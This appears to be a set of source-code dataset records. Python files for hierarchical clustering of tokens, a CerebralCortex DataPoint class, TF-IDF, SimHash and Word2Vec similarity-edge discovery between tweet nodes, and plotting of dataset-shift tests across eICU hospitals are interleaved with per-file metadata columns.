    # consider different cluster granularities, i.e., the cut level from the leaves
for clustering_level in clustering_levels_to_consider:
# load the linkage matrix
sav_linkages = "heirarchical_clustering/linkage_matrix.pkl"
with open(sav_linkages, "rb") as f:
z: np.ndarray = pkl.load(f)
# load the list of tokens (which corresponds to the linkage matrix)
# i.e., i in tokens[i], corresponds to cluster i referenced in z[:,0:2]
sav_tokens = "heirarchical_clustering/tokens.json"
with open(sav_tokens, "rb") as f:
tokens: list = json.load(f)
# see link, below, on interpreting z, i.e., cluster_index1, cluster_index2, dist, cluster size
# https://docs.scipy.org/doc/scipy/reference/generated/scipy.cluster.hierarchy.fcluster.html
clusters: typing.Generator = gen_clusters(
level=clustering_level, z=z, tokens=tokens
) # generator of (cluster_index, list of tokens) of each cluster for the current cut 'level'
# build a hash, to translate token to cluster index for given granularity
h: dict = {
token: cluster_index
for cluster_index, cluster in clusters
for token in cluster
}
# save
sav = f"cluster_hashes/level_{clustering_level}_hash.json"
os.makedirs(os.path.dirname(sav), exist_ok=True)
with open(sav, "w") as f:
json.dump(h, f, indent=4)
def gen_clusters(level: int = 1, *, z: np.ndarray, tokens: list) -> typing.Generator:
"""Return a generator of (cluster_index, list of tokens) of each cluster
for the current cut 'level'.
"""
# add an 'operation index' column to z
x: np.ndarray = np.hstack(
(z, np.array([i for i in range(z.shape[0])]).reshape(-1, 1))
)
# note: cluster_index = x[:,4] + len(tokens) is the index of the cluster created by the operation
# cluster indices 0 to len(tokens) - 1, corresponds to the individual tokens
#
# iterate over each cut level (from leafs) until at specified 'level'
# and collect z_rows_of_interest, an iterable of z row indices, representing the clusters wrt., cut 'level'
#
seen_z_rows = [] # all z row clusters seen in previous levels
seen_cluster_indices = [index for index, token in enumerate(tokens)]
for i in range(1, level + 1): # i.e., cluster 1 to level
x_dropped: np.ndarray = np.delete(
x, seen_z_rows, axis=0
) # i.e., drop clusters seen at previous level
x_i: np.ndarray = x_dropped[
[row.all() for row in np.isin(x_dropped[:, 0:2], seen_cluster_indices)]
] # the bit of x that lists the clusters in the current cut level, i.e., those clusters that reference only previously seen cluster_indices
z_rows_of_interest: np.ndarray = x_i[:, 4].astype(int)
seen_z_rows += [row for row in z_rows_of_interest]
seen_cluster_indices += [z_row + len(tokens) for z_row in x_i[:,4]]
# generate a (cluster_index, list of tokens) for each cluster of the current cut 'level'
for row in z_rows_of_interest:
cluster_index = int(x[row, 4]) + len(
tokens
) # i.e., the 'true' cluster indices of z[row,4] + len(tokens) - 1
yield (
cluster_index,
cluster_index_to_tokens(cluster_index, z=z, tokens=tokens),
)
def cluster_index_to_tokens(cluster_index: int, *, z: np.ndarray, tokens: list) -> list:
"""Return a list of tokens corresponding to a cluster index (as per z[:, 0:2]) values."""
if cluster_index < len(tokens):
return [tokens[cluster_index]]
else:
c1, c2 = z[cluster_index - len(tokens), 0:2].astype(int)
return cluster_index_to_tokens(
c1, z=z, tokens=tokens
) + cluster_index_to_tokens(c2, z=z, tokens=tokens)
if __name__ == "__main__":
main()
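# Added usage sketch: reading back one of the hashes written by main(). The
# token passed in is a placeholder, not taken from the corpus.
def _lookup_cluster(token, level=12):
    with open("cluster_hashes/level_{}_hash.json".format(level)) as f:
        token_to_cluster = json.load(f)
    return token_to_cluster.get(token)  # None if the token was never clustered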
| 37.278261
| 148
| 0.648239
| 0
| 0
| 1,939
| 0.452298
| 0
| 0
| 0
| 0
| 1,944
| 0.453464
|
3c529f808ec5b62668f3e070b0cf33366833814f
| 3,434
|
py
|
Python
|
cerebralcortex/core/datatypes/datapoint.py
|
hippietilley/CerebralCortex-Kernel
|
c7dac033d9561f14bdb72430577db6ae4e3c7911
|
[
"BSD-2-Clause"
] | null | null | null |
cerebralcortex/core/datatypes/datapoint.py
|
hippietilley/CerebralCortex-Kernel
|
c7dac033d9561f14bdb72430577db6ae4e3c7911
|
[
"BSD-2-Clause"
] | null | null | null |
cerebralcortex/core/datatypes/datapoint.py
|
hippietilley/CerebralCortex-Kernel
|
c7dac033d9561f14bdb72430577db6ae4e3c7911
|
[
"BSD-2-Clause"
] | null | null | null |
# Copyright (c) 2018, MD2K Center of Excellence
# - Nasir Ali <nasir.ali08@gmail.com>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from datetime import datetime
from typing import Any
class DataPoint:
def __init__(self,
start_time: datetime = None,
end_time: datetime = None,
offset: str = None,
sample: Any = None):
"""
        DataPoint is the lowest-level data representation entity in CerebralCortex.
:param start_time:
:param end_time:
:param offset: in milliseconds
:param sample:
"""
self._start_time = start_time
self._end_time = end_time
self._offset = offset
self._sample = sample
@property
def sample(self):
return self._sample
@sample.setter
def sample(self, val):
self._sample = val
@property
def start_time(self):
return self._start_time
@start_time.setter
def start_time(self, val):
self._start_time = val
@property
def end_time(self):
return self._end_time
@end_time.setter
def end_time(self, val):
self._end_time = val
@property
def offset(self):
return self._offset
@offset.setter
def offset(self, val):
self._offset = val
def getKey(self):
return self._start_time
@classmethod
def from_tuple(cls, start_time: datetime, sample: Any, end_time: datetime = None, offset: str = None):
return cls(start_time=start_time, end_time=end_time, offset=offset, sample=sample)
def __str__(self):
return 'DataPoint(' + ', '.join(
map(str, [self._start_time, self._end_time, self._offset, self._sample])) + ')\n'
def __repr__(self):
return 'DataPoint(' + ', '.join(
map(str, [self._start_time, self._end_time, self._offset, self._sample])) + ')\n'
def __lt__(self, dp):
# if hasattr(dp, 'getKey'):
return self.getKey().__lt__(dp.getKey())
def __eq__(self, dp):
return self._start_time == dp.start_time
def __hash__(self):
return hash(('start_time', self.start_time))
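# Added usage sketch (not part of the original module): constructing and
# ordering DataPoints; the values are illustrative placeholders.
def _example_datapoints():
    from datetime import timedelta
    t0 = datetime(2018, 1, 1, 12, 0, 0)
    dp1 = DataPoint.from_tuple(start_time=t0, sample=[0.1, 0.2], offset="0")
    dp2 = DataPoint(start_time=t0 + timedelta(seconds=1), sample=72)
    return sorted([dp2, dp1])  # ordered by start_time via getKey/__lt__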
| 33.019231
| 106
| 0.674432
| 1,995
| 0.580955
| 0
| 0
| 748
| 0.217822
| 0
| 0
| 1,647
| 0.479616
|
3c5554bd05cd5239ce11e4e4dd8fa2e50df67f34
| 7,444
|
py
|
Python
|
code/reveal_links.py
|
antonia42/DeLi
|
f07dc79a98eebccbcdcb4ee74eb4570190e6f441
|
[
"MIT"
] | 1
|
2021-05-20T20:53:19.000Z
|
2021-05-20T20:53:19.000Z
|
code/reveal_links.py
|
antonia42/DeLi
|
f07dc79a98eebccbcdcb4ee74eb4570190e6f441
|
[
"MIT"
] | 1
|
2021-04-06T08:34:05.000Z
|
2021-11-24T10:47:27.000Z
|
code/reveal_links.py
|
antonia42/DeLi
|
f07dc79a98eebccbcdcb4ee74eb4570190e6f441
|
[
"MIT"
] | null | null | null |
import sys
import networkx as nx
from simhash import Simhash, SimhashIndex  # used by reveal_hidden_links_simhash below
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity
# if there is a problem with gensim and Word2Vec, check the python version
# to be 2.7
# print('Hello from {}'.format(sys.version))
# TF-IDF helper function
def reveal_similar_links(G, cids, contents, threshold=0.5):
"""
    Function to calculate the TF-IDF vectors for all tweet contents and then
    compute the cosine similarity for all pairs. It returns the graph with
    edges added between similar tweet-nodes whenever the cosine similarity for
    a pair of tweet-nodes is above a threshold.
Args:
G (networkx.Graph()): The initialized instance of the networkx Graph()
class.
cids (list): The list with the tweet ids from the tweet-nodes of the
graph.
contents (list): The list with the preprocessed content from the tweet-
nodes. Indexing is the same as in the 'cids' list.
        threshold (float): The cosine similarity threshold. If the similarity
            of a pair exceeds this threshold, an edge is added to the graph
            between these nodes.
Returns:
The enriched graph instance (networkx.Graph()), after revealing the
hidden edges between similar tweet-nodes.
"""
try:
tfidf = TfidfVectorizer(norm='l2', max_features=1000)
tf_idf_matrix = tfidf.fit_transform(contents)
tf_idf_matrix.todense()
pairwise_similarity = tf_idf_matrix * tf_idf_matrix.T
cos_matrix = (pairwise_similarity).A
tsize = len(contents)
for i in range(0, tsize):
for j in range(i+1, tsize):
# similarity score is in [-1, 1]
sim_score = cos_matrix[i][j]
if sim_score > threshold:
# reveal hidden edge (between similar tweet-nodes)
G.add_edge(cids[i], cids[j], edgetype='similarTo')
except:
pass
return G
# Add edges between all pairs of similar content nodes based on TFIDF
def reveal_hidden_links_tfidf(G, content_dict, threshold):
"""
Function to reveal hidden similarity edges between tweet-nodes based only
on TF-IDF vectors and a cosine similarity threshold.
Args:
G (networkx.Graph()): The initialized instance of the networkx Graph()
class.
content_dict (dict): The dict with the tweet ids from the tweet-nodes
of the graph and the corresponding preprocessed tweet/content text.
        threshold (float): The cosine similarity threshold. If the similarity
            of a pair exceeds this threshold, an edge is added to the graph
            between these nodes.
Returns:
        The return value of the function 'reveal_similar_links', i.e. an
        enriched graph instance, after revealing the hidden edges between
        similar tweet-nodes.
"""
cids = content_dict.keys()
contents = content_dict.values()
return reveal_similar_links(G, cids, contents, threshold)
# Creates w-shingles for SimHash
def get_shingles(sentence, n):
"""
Function to reveal hidden similarity edges between tweet-nodes based on
SimHash, an LSH approximation on TF-IDF vectors and a cosine similarity
threshold.
Args:
sentence (str): The sentence (preprocessed text from a tweet-node),
from which the shingles will be created.
n (int): The size of the shingle. In this case, the size is always set
to be three, and it means that all possible tuples with three
consecutive words will be created.
Returns:
A list with all triples made by consecutive words in a sentence.
"""
s = sentence.lower()
return [s[i:i + n] for i in range(max(len(s) - n + 1, 1))]
# Add edges between all pairs of similar content nodes based on SimHash
def reveal_hidden_links_simhash(G, content_dict, threshold):
"""
Function to reveal hidden similarity edges between tweet-nodes based on
SimHash, an LSH approximation on TF-IDF vectors and a cosine similarity
threshold.
Args:
G (networkx.Graph()): The initialized instance of the networkx Graph()
class.
content_dict (dict): The dict with the tweet ids from the tweet-nodes
of the graph and the corresponding preprocessed tweet/content text.
        threshold (float): The cosine similarity threshold. If the similarity
            of a pair exceeds this threshold, an edge is added to the graph
            between these nodes.
Returns:
        The return value of the function 'reveal_similar_links', i.e. an
        enriched graph instance, after revealing the hidden edges between
        similar tweet-nodes.
"""
objs = []
for cid, content in content_dict.items():
objs.append((cid, Simhash(get_shingles(content, 3), f=1)))
index = SimhashIndex(objs, f=1, k=2)
for key in index.bucket:
bucket_item = index.bucket[key]
contents = []
cids = []
for item in bucket_item:
newid = str(item.split(',')[-1])
contents.append(content_dict[newid])
cids.append(newid)
G = reveal_similar_links(G, cids, contents, threshold)
return G
# Add edges between all pairs of similar content nodes based on word2vec
def reveal_hidden_links_w2v(G, content_dict, threshold, model, k=3):
"""
Function to reveal hidden similarity edges between tweet-nodes based on
Word2Vec enriched TF-IDF vectors and a cosine similarity threshold. More
specifically, for each word in a tweet, we add the 'k' most similar words
according to the pre-trained Word2Vec model.
Note: If you need to speed up the code during experimentation, it is better
to calculate the Word2Vec enriched text and cache it.
Args:
G (networkx.Graph()): The initialized instance of the networkx Graph()
class.
content_dict (dict): The dict with the tweet ids from the tweet-nodes
of the graph and the corresponding preprocessed tweet/content text.
        threshold (float): The cosine similarity threshold. If the similarity
            of a pair exceeds this threshold, an edge is added to the graph
            between these nodes.
model (gensim.models.KeyedVectors()): The Google's pre-trained
Word2Vec model.
k (int): The number of similar words to add.
Returns:
        The return value of the function 'reveal_similar_links', i.e. an
        enriched graph instance, after revealing the hidden edges between
        similar tweet-nodes.
"""
contents = content_dict.values()
cids = content_dict.keys()
enriched_contents = []
for c in contents:
words = c.split(' ')
enriched_list = []
for w in words:
try:
w2v_sim_list = model.most_similar(w, topn=k)
sim_words = [str(t[0]) for t in w2v_sim_list]
enriched_list.append(' '.join(sim_words) + ' ' + w)
except:
enriched_list.append(w)
pass
if len(enriched_list) > 0:
enriched_contents.append(' '.join(enriched_list))
return reveal_similar_links(G, cids, enriched_contents, threshold)
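# Added usage sketch: revealing TF-IDF similarity edges on a toy graph. The
# ids and texts are placeholders; lists are passed straight to
# reveal_similar_links to stay Python-3 friendly (the comments above suggest
# the module targeted Python 2.7 dict views).
def _example_tfidf_links():
    cids = ['t1', 't2', 't3']
    contents = ['election results tonight',
                'results of the election tonight',
                'cute cat picture']
    G = nx.Graph()
    G.add_nodes_from(cids)
    G = reveal_similar_links(G, cids, contents, threshold=0.5)
    return list(G.edges(data=True))  # similar pairs carry edgetype='similarTo'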
| 35.113208
| 79
| 0.657308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 4,997
| 0.671279
|
3c556dec90e23792b76acc982f2031b9cf0acc91
| 27,754
|
py
|
Python
|
generate_hosp_plot.py
|
ChunaraLab/medshifts
|
cd8a4ac415e7ef15b6e40a8699b08cd468ea9e4b
|
[
"MIT"
] | 1
|
2021-11-25T12:26:16.000Z
|
2021-11-25T12:26:16.000Z
|
generate_hosp_plot.py
|
ChunaraLab/medshifts
|
cd8a4ac415e7ef15b6e40a8699b08cd468ea9e4b
|
[
"MIT"
] | null | null | null |
generate_hosp_plot.py
|
ChunaraLab/medshifts
|
cd8a4ac415e7ef15b6e40a8699b08cd468ea9e4b
|
[
"MIT"
] | null | null | null |
'''
Modifed from code by Stephan Rabanser https://github.com/steverab/failing-loudly
Plot test results across hospitals
Usage:
# region
python generate_hosp_plot.py --datset eicu --path orig --test_type multiv --num_hosp 4 --random_runs 100 --min_samples 5000 --sens_attr race --group --group_type regions --limit_samples
# beds
python generate_hosp_plot.py --datset eicu --path orig --test_type multiv --num_hosp 4 --random_runs 100 --min_samples 10000 --sens_attr race --group --group_type beds --limit_samples
# region, beds
python generate_hosp_plot.py --datset eicu --path orig --test_type multiv --num_hosp 5 --random_runs 100 --min_samples 5000 --sens_attr race --group --group_type regions_beds --limit_samples
# region, beds, teaching
python generate_hosp_plot.py --datset eicu --path orig --test_type multiv --num_hosp 6 --random_runs 100 --min_samples 4000 --sens_attr race --group --group_type regions_beds_teaching --limit_samples
# hospitals
python generate_hosp_plot.py --datset eicu --path orig --test_type multiv --num_hosp 10 --random_runs 100 --min_samples 1631 --sens_attr race --limit_samples
# python generate_hosp_plot.py --datset eicu --path orig --test_type multiv --num_hosp 10 --random_runs 100 --min_samples 2000 --sens_attr race --limit_samples
'''
import argparse
from multiprocessing import Value
import pickle
import numpy as np
import seaborn as sns
import pandas as pd
from scipy import stats
from matplotlib.colors import ListedColormap
from itertools import combinations
seed = 1
np.random.seed(seed)
from shift_detector import *
from shift_locator import *
from shift_applicator import *
from data_utils import *
import os
import sys
from exp_utils import *
from plot_utils import *
# -------------------------------------------------
# CONFIG
# -------------------------------------------------
# make_keras_picklable()
np.set_printoptions(threshold=sys.maxsize)
parser = argparse.ArgumentParser()
parser.add_argument("--datset", type=str, default='eicu')
parser.add_argument("--path", type=str, default='orig')
parser.add_argument("--test_type", type=str, default='multiv')
parser.add_argument("--sens_attr", type=str, default='gender') # gender, race
parser.add_argument("--num_hosp", type=int, default=5)
parser.add_argument("--random_runs", type=int, default=10)
parser.add_argument("--min_samples", type=int, default=1500)
parser.add_argument("--group", action='store_true')
parser.add_argument("--group_type", type=str, default='hosp')
parser.add_argument("--limit_samples", action='store_true') # limit two-sample testing to 5000 samples
args = parser.parse_args()
datset = args.datset # sys.argv[1]
test_type = args.test_type # sys.argv[3]
use_group = args.group
group_type = args.group_type
sens_attr = args.sens_attr
limit_samples = args.limit_samples
HospitalGroups_eicu, HospitalGroupsColnames_eicu = get_groups_colnames(group_type)
# path = './hosp_results_gossis_multiv/'
path = './hosp_results_{}_{}_shuffle/'.format(datset, test_type)
path += '{}_group{}_{}_nh{}_run{}_mins{}_s{}_l{}_{}/'.format(datset, use_group, group_type, args.num_hosp, args.random_runs, args.min_samples, sens_attr, limit_samples, args.path)
if not os.path.exists(path):
os.makedirs(path)
# Define train-test pairs of hospitals
NUM_HOSPITALS_TOP = args.num_hosp # 5 # hospitals with records >= 1000
hosp_pairs = []
# TODO move to data_utils
if datset =='eicu':
if use_group:
HospitalIDs = HospitalGroups_eicu
HospitalIDsColnames = HospitalGroupsColnames_eicu
else: # single hospitals
HospitalIDs = HospitalIDs_eicu
HospitalIDsColnames = HospitalIDs_eicu
FeatureGroups = FeatureGroups_eicu
# Define feature groups
# feature_groups = [['labs','vitals','demo','others','saps2diff']]
# feature_groups = [['labs','labs_blood_gas']]
# feature_groups = [['vitals']]
# feature_groups = [['demo']]
# feature_groups = [['saps2labs','saps2vitals']]
# feature_groups = [['saps2'], ['labs'], ['vitals'], ['demo']]
feature_groups = [['saps2']]
# feature_groups = [['saps2'], ['labs','vitals','demo','others']]
elif datset =='gossis':
HospitalIDs = HospitalIDs_gossis
HospitalIDsColnames = HospitalIDs_gossis
FeatureGroups = FeatureGroups_gossis
# Define feature groups
feature_groups = [['APACHE_covariate']]
# feature_groups = [['demographic'], ['vitals'], ['labs','labs_blood_gas'],['APACHE_covariate']]
# feature_groups = [['APACHE_covariate'], ['labs','labs_blood_gas'], ['vitals'], ['APACHE_comorbidity'],
# ['demographic','vitals','labs','labs_blood_gas','APACHE_comorbidity']]
HospitalIDs = HospitalIDs[:NUM_HOSPITALS_TOP]
HospitalIDsColnames = HospitalIDsColnames[:NUM_HOSPITALS_TOP]
# HospitalIDs = [i for i in HospitalIDs if i not in [413,394,199,345]]
for hi in range(len(HospitalIDs)):
for hj in range(len(HospitalIDs)):
hosp_pairs.append((hi,hj,[HospitalIDs[hi]],[HospitalIDs[hj]]))
# hosp_pairs = [([394],[416])]
print('Use groups', use_group, 'Sensitive attribute', sens_attr, 'Hospital pairs', hosp_pairs)
# Define DR methods
# dr_techniques = [DimensionalityReduction.NoRed.value, DimensionalityReduction.PCA.value, DimensionalityReduction.SRP.value, DimensionalityReduction.UAE.value, DimensionalityReduction.TAE.value, DimensionalityReduction.BBSDs.value, DimensionalityReduction.BBSDh.value]
dr_techniques = [DimensionalityReduction.NoRed.value]
# dr_techniques = [DimensionalityReduction.NoRed.value, DimensionalityReduction.PCA.value]
# dr_techniques = [DimensionalityReduction.NoRed.value, DimensionalityReduction.PCA.value, DimensionalityReduction.SRP.value]
if test_type == 'multiv':
# dr_techniques = [DimensionalityReduction.NoRed.value, DimensionalityReduction.PCA.value, DimensionalityReduction.SRP.value, DimensionalityReduction.UAE.value, DimensionalityReduction.TAE.value, DimensionalityReduction.BBSDs.value]
dr_techniques = [DimensionalityReduction.NoRed.value]
# dr_techniques = [DimensionalityReduction.NoRed.value, DimensionalityReduction.PCA.value]
# dr_techniques = [DimensionalityReduction.NoRed.value, DimensionalityReduction.PCA.value, DimensionalityReduction.SRP.value]
if test_type == 'univ':
dr_techniques_plot = dr_techniques.copy()
# dr_techniques_plot.append(DimensionalityReduction.Classif.value)
else:
dr_techniques_plot = dr_techniques.copy()
# Define test types and general test sample sizes
test_types = [td.value for td in TestDimensionality]
if test_type == 'multiv':
od_tests = []
md_tests = [MultidimensionalTest.MMD.value]
# samples = [10, 20, 50, 100, 200, 500, 1000]
# samples = [100, 1000]
samples = [args.min_samples]
# samples = [2500]
# samples = [1000, 1500]
# samples = [10, 20, 50, 100, 200]
else:
# od_tests = [od.value for od in OnedimensionalTest]
od_tests = [OnedimensionalTest.KS.value]
md_tests = []
# samples = [10, 20, 50, 100, 200, 500, 1000, 9000]
# samples = [100, 1000]
samples = [args.min_samples]
# samples = [2500]
# samples = [1000, 1500]
# samples = [10, 20, 50, 100, 200, 500]
difference_samples = 10
# Number of random runs to average results over
random_runs = args.random_runs # 5
# Significance level
sign_level = 0.05
# sign_level = 0.01
# Define shift types
# if args.path == 'orig': # sys.argv[2]
# shifts = ['orig']
# brightness = [0.75]
# # shifts = ['rand', 'orig']
# # brightness = [1.25, 0.75]
# else:
# shifts = []
shifts = ['orig']
# -------------------------------------------------
# PIPELINE START
# -------------------------------------------------
sns.set_style("ticks")
cmap = sns.color_palette("rocket_r", as_cmap=True)
# cmap = sns.color_palette("vlag", as_cmap=True)
# cmap = sns.cubehelix_palette(2, hue=0.05, rot=0, light=0.9, dark=0, as_cmap=True)
# Discrete colormap using code by lanery https://stackoverflow.com/questions/38836154/discrete-legend-in-seaborn-heatmap-plot
cmap_binary = sns.cubehelix_palette(2, hue=0.05, rot=0, light=0.9, dark=0)
NUM_METRICS = 36
samples_shifts_rands_dr_tech_feats_hosps = np.ones((len(samples), len(shifts), random_runs, len(dr_techniques_plot), len(feature_groups), len(hosp_pairs))) * (-1)
samples_shifts_rands_dr_tech_feats_hosps_t_val = np.ones((len(samples), len(shifts), random_runs, len(dr_techniques_plot), len(feature_groups), len(hosp_pairs))) * (-1)
samples_shifts_rands_feats_hosps_te_acc = np.ones((len(samples), len(shifts), random_runs, len(feature_groups), len(hosp_pairs), NUM_METRICS)) * (-1) # 0-auc, 1-smr # TODO add auc, smr, p-val, mmd in same array. add hosp_pair
samples_shifts_rands_feats_hosp_pairs_te_acc = np.ones((len(samples), len(shifts), random_runs, len(feature_groups), len(HospitalIDs), len(HospitalIDs), NUM_METRICS)) * (-1) # 0-auc, 1-smr # TODO add auc, smr, p-val, mmd in same array. add hosp_pair
for feature_group_idx, feature_group in enumerate(feature_groups):
target = FeatureGroups['outcome']
feature_set = []
for group in feature_group:
feature_set += FeatureGroups[group]
samples_shifts_rands_feat_hosps_p_vals = np.ones((len(samples), len(shifts), len(dr_techniques_plot), len(od_tests), len(feature_set), random_runs, len(hosp_pairs))) * (-1)
samples_shifts_rands_feat_hosps_t_vals = np.ones((len(samples), len(shifts), len(dr_techniques_plot), len(od_tests), len(feature_set), random_runs, len(hosp_pairs))) * (-1)
for hosp_pair_idx, (hosp_train_idx, hosp_test_idx, hosp_train, hosp_test) in enumerate(hosp_pairs):
print("\n==========\nFeature Set, Hosp Train, Hosp Test", feature_group, hosp_train, hosp_test)
print("==========\n")
feats_path = path + "_".join(feature_group) + '/'
hosp_folder_name = 'tr_' + '_'.join(map(str, hosp_train)) + '_ts_' + '_'.join(map(str, hosp_test))
hosp_path = feats_path + hosp_folder_name + '/'
samples_shifts_rands_dr_tech = np.load("%s/samples_shifts_rands_dr_tech.npy" % (hosp_path))
samples_shifts_rands_dr_tech_t_val = np.load("%s/samples_shifts_rands_dr_tech_t_val.npy" % (hosp_path))
with open("%s/samples_shifts_rands_metrics.pkl" % (hosp_path), 'rb') as fr:
metric_results = pickle.load(fr)
# print("sadf", "%s/samples_shifts_rands_metrics.pkl" % (hosp_path))
# print(metric_results.results_train[0,0,0])
samples_shifts_rands_te_acc, metric_names = get_metrics_array(metric_results)
samples_shifts_rands_dr_tech_feats_hosps[:,:,:,:,feature_group_idx,hosp_pair_idx] = samples_shifts_rands_dr_tech
samples_shifts_rands_dr_tech_feats_hosps_t_val[:,:,:,:,feature_group_idx,hosp_pair_idx] = samples_shifts_rands_dr_tech_t_val
samples_shifts_rands_feats_hosps_te_acc[:,:,:,feature_group_idx,hosp_pair_idx,:] = samples_shifts_rands_te_acc
samples_shifts_rands_feats_hosp_pairs_te_acc[:,:,:,feature_group_idx,hosp_train_idx,hosp_test_idx,:] = samples_shifts_rands_te_acc
if test_type == 'univ':
samples_shifts_rands_feat_p_vals = np.load("%s/samples_shifts_rands_feat_p_vals.npy" % (hosp_path))
samples_shifts_rands_feat_t_vals = np.load("%s/samples_shifts_rands_feat_t_vals.npy" % (hosp_path))
samples_shifts_rands_feat_hosps_p_vals[:,:,:,:,:,:,hosp_pair_idx] = samples_shifts_rands_feat_p_vals
samples_shifts_rands_feat_hosps_t_vals[:,:,:,:,:,:,hosp_pair_idx] = samples_shifts_rands_feat_t_vals
np.save("%s/samples_shifts_rands_feat_hosps_p_vals.npy" % (feats_path), samples_shifts_rands_feat_hosps_p_vals)
np.save("%s/samples_shifts_rands_feat_hosps_t_vals.npy" % (feats_path), samples_shifts_rands_feat_hosps_t_vals)
np.save("%s/samples_shifts_rands_dr_tech_feats_hosps.npy" % (path), samples_shifts_rands_dr_tech_feats_hosps)
np.save("%s/samples_shifts_rands_dr_tech_feats_hosps_t_val.npy" % (path), samples_shifts_rands_dr_tech_feats_hosps_t_val)
np.save("%s/samples_shifts_rands_feats_hosps_te_acc.npy" % (path), samples_shifts_rands_feats_hosps_te_acc)
np.save("%s/samples_shifts_rands_feats_hosp_pairs_te_acc.npy" % (path), samples_shifts_rands_feats_hosp_pairs_te_acc)
# Feat, dr, shift, sample - mean
for feature_group_idx, feature_group in enumerate(feature_groups):
print("==========\nPlotting", feature_group)
print("==========")
target = FeatureGroups['outcome']
feature_set = []
for group in feature_group:
feature_set += FeatureGroups[group]
feats_path = path + "_".join(feature_group) + '/'
if test_type == 'univ':
samples_shifts_rands_feat_hosps_p_vals = np.load("%s/samples_shifts_rands_feat_hosps_p_vals.npy" % (feats_path))
samples_shifts_rands_feat_hosps_t_vals = np.load("%s/samples_shifts_rands_feat_hosps_t_vals.npy" % (feats_path))
for dr_idx, dr in enumerate(dr_techniques_plot):
for shift_idx, shift in enumerate(shifts):
for si, sample in enumerate(samples):
hosp_pair_pval = np.ones((len(HospitalIDs), len(HospitalIDs))) * (-1)
hosp_pair_tval = np.ones((len(HospitalIDs), len(HospitalIDs))) * (-1)
if test_type == 'univ':
# hosp_pair_feat_pval = np.ones((len(hosp_pairs), len(feature_set), random_runs))
hosp_pair_feat_pval = np.ones((len(hosp_pairs), len(feature_set)))
hosp_pair_feat_tval = np.ones((len(hosp_pairs), len(feature_set)))
for hosp_pair_idx, (hosp_train_idx, hosp_test_idx, hosp_train, hosp_test) in enumerate(hosp_pairs):
feats_dr_tech_shifts_samples_results = samples_shifts_rands_dr_tech_feats_hosps[si,shift_idx,:,dr_idx,feature_group_idx,hosp_pair_idx]
feats_dr_tech_shifts_samples_results_t_val = samples_shifts_rands_dr_tech_feats_hosps_t_val[si,shift_idx,:,dr_idx,feature_group_idx,hosp_pair_idx]
mean_p_vals = np.mean(feats_dr_tech_shifts_samples_results)
std_p_vals = np.std(feats_dr_tech_shifts_samples_results)
mean_t_vals = np.mean(feats_dr_tech_shifts_samples_results_t_val)
hosp_pair_pval[hosp_train_idx, hosp_test_idx] = mean_p_vals < sign_level
hosp_pair_tval[hosp_train_idx, hosp_test_idx] = mean_t_vals
# adjust_sign_level = sign_level / len(hosp_pairs)
adjust_sign_level = sign_level
if test_type == 'univ':
dr_tech_shifts_samples_results_feat_p_val = samples_shifts_rands_feat_hosps_p_vals[si,shift_idx,dr_idx,0,:,:,hosp_pair_idx] # TODO iterate for od_tests
dr_tech_shifts_samples_results_feat_t_val = samples_shifts_rands_feat_hosps_t_vals[si,shift_idx,dr_idx,0,:,:,hosp_pair_idx] # TODO iterate for od_tests
mean_feat_p_vals = np.mean(dr_tech_shifts_samples_results_feat_p_val, axis=1)
mean_feat_t_vals = np.mean(dr_tech_shifts_samples_results_feat_t_val, axis=1)
# hosp_pair_feat_pval[hosp_pair_idx, :, :] = dr_tech_shifts_samples_results_feat_p_val
hosp_pair_feat_pval[hosp_pair_idx, :] = mean_feat_p_vals < adjust_sign_level
hosp_pair_feat_tval[hosp_pair_idx, :] = mean_feat_t_vals
# p-value MMD test
hosp_avg_pval = hosp_pair_pval.mean(axis=1)
                hosp_pair_pval_triu = np.triu(np.ones_like(hosp_pair_pval, dtype=bool))  # np.bool is removed in recent NumPy
np.fill_diagonal(hosp_pair_pval_triu, False)
hosp_pair_pval = pd.DataFrame(hosp_pair_pval, columns=HospitalIDsColnames, index=HospitalIDsColnames)
hosp_pair_pval.to_csv("%s/%s_%s_%s_%s_p_val_df.csv" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), index=True)
# cmap_binary = sns.cubehelix_palette(2, hue=0.05, rot=0, light=0.9, dark=0)
# fig = sns.heatmap(hosp_pair_pval, linewidths=0.5, cmap=ListedColormap(cmap_binary))
fig = sns.heatmap(hosp_pair_pval, mask=hosp_pair_pval_triu, linewidths=0.5, cmap=ListedColormap(cmap_binary))
colorbar = fig.collections[0].colorbar
colorbar.set_ticks([0.25, 0.75])
colorbar.set_ticklabels(['No Data Shift', 'Data Shift'])
label_text = 'Hospital ID'
if use_group and group_type=='regions':
label_text = 'Region'
elif use_group and group_type=='beds':
label_text = 'Numbedscategory'
plt.xlabel(label_text) # Target
plt.ylabel(label_text) # Source
if not use_group:
plt.xticks(rotation=30)
plt.savefig("%s/%s_%s_%s_%s_p_val_hmp.pdf" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), bbox_inches='tight')
plt.clf()
